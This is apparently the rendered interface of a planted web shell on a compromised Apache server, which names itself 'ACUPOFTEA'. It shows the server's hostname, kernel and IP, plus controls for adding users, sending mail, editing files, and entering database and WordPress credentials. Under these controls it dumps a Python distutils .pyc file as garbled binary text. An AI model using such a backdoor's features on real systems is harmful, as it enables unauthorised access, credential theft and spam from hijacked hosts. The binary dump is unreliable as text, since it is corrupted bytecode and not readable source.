System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
distutils
/
command
/
__pycache__
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
install_scripts.cpython-36.opt-2.pyc
3 \� � @ s@ d dl Z d dlmZ d dlmZ d dlmZ G dd� de�ZdS )� N)�Command)�log)�ST_MODEc @ sL e Zd ZdZddddgZddgZdd� Zdd� Zdd� Zdd� Z dd� Z dS )�install_scriptsz%install scripts (Python or otherwise)�install-dir=�d�directory to install scripts to� build-dir=�b�'build directory (where to install from)�force�f�-force installation (overwrite existing files)� skip-buildN�skip the build stepsc C s d | _ d| _d | _d | _d S )Nr )�install_dirr � build_dir� skip_build)�self� r �9/usr/lib64/python3.6/distutils/command/install_scripts.py�initialize_options s z"install_scripts.initialize_optionsc C s | j dd � | j dd dd� d S ) NZbuild� build_scriptsr Zinstallr r r r )r r )r r )r r )r r )Zset_undefined_options)r r r r �finalize_options! s z install_scripts.finalize_optionsc C s� | j s| jd� | j| j| j�| _tjdkr�xT| j� D ]H}| j rNt jd|� q6tj|�t dB d@ }t jd||� tj||� q6W d S )Nr �posixzchanging mode of %sim i� zchanging mode of %s to %o)r Zrun_commandZ copy_treer r �outfiles�os�name�get_outputsZdry_runr �info�statr �chmod)r �file�moder r r �run) s zinstall_scripts.runc C s | j jp g S )N)Zdistribution�scripts)r r r r � get_inputs8 s zinstall_scripts.get_inputsc C s | j pg S )N)r )r r r r r ; s zinstall_scripts.get_outputs)r r r )r r r )r r r )r Nr )�__name__� __module__�__qualname__ZdescriptionZuser_optionsZboolean_optionsr r r$ r&